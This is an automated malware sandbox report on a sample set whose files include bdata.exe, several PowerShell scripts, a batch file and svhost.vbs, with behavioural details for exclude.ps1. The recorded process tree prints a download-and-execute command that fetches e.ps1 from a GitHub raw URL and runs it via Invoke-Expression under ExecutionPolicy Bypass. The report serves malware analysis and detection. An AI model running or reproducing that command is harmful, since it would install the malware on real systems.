Overview
overview
10Static
static
10i965652f-m...ta.exe
windows7-x64
1i965652f-m...ta.exe
windows10-2004-x64
7i965652f-main/e.ps1
windows7-x64
3i965652f-main/e.ps1
windows10-2004-x64
3i965652f-m...de.ps1
windows7-x64
3i965652f-m...de.ps1
windows10-2004-x64
8i965652f-m...le.bat
windows7-x64
8i965652f-m...le.bat
windows10-2004-x64
8i965652f-m...ab.ps1
windows7-x64
3i965652f-m...ab.ps1
windows10-2004-x64
8i965652f-main/m.ps1
windows7-x64
8i965652f-main/m.ps1
windows10-2004-x64
8i965652f-m...st.vbs
windows7-x64
3i965652f-m...st.vbs
windows10-2004-x64
8Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
16-01-2025 12:50
Behavioral task
behavioral1
Sample
i965652f-main/bdata.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
i965652f-main/bdata.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
i965652f-main/e.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
i965652f-main/e.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
i965652f-main/exclude.ps1
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
i965652f-main/exclude.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
i965652f-main/file.bat
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
i965652f-main/file.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
i965652f-main/grab.ps1
Resource
win7-20240729-en
Behavioral task
behavioral10
Sample
i965652f-main/grab.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
i965652f-main/m.ps1
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
i965652f-main/m.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
i965652f-main/svhost.vbs
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
i965652f-main/svhost.vbs
Resource
win10v2004-20241007-en
General
-
Target
i965652f-main/exclude.ps1
-
Size
979B
-
MD5
22b7c77e64476f1842845f1529369794
-
SHA1
b034134dfe982c73793a897278301d05a87a31a4
-
SHA256
cdcfc9b6d8e0a133e249819859bd5d4aa303dd128ac326ce50d32dcfa884bc56
-
SHA512
dd32593c528705522f6380ea4751c7c86a18d3a901094ef71babbf12f3ab5aee538052c033d7ca19d622af1b230e1a5fea627608e280b8913d8e63c85f69d752
Malware Config
Signatures
-
pid Process 2764 powershell.exe 2940 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2764 powershell.exe 2764 powershell.exe 2764 powershell.exe 2940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2940 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2764 wrote to memory of 2940 2764 powershell.exe 31 PID 2764 wrote to memory of 2940 2764 powershell.exe 31 PID 2764 wrote to memory of 2940 2764 powershell.exe 31
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5587e2fdf4764be7b0ecb26f3c60f5cf8
SHA12732246e0cf8a554e8f4c216dc80a290da53ce29
SHA256659158615759de29b0646b86faa08bce17655656ad7c4f24c76c6fcf8e510101
SHA51208b6820a7437d474ec47653d4d93aa278bcee76bd0b3517cf6924372500da44b42af2b751b49c210aff09f60154113a6933714779b85b9798c2accdc33457efb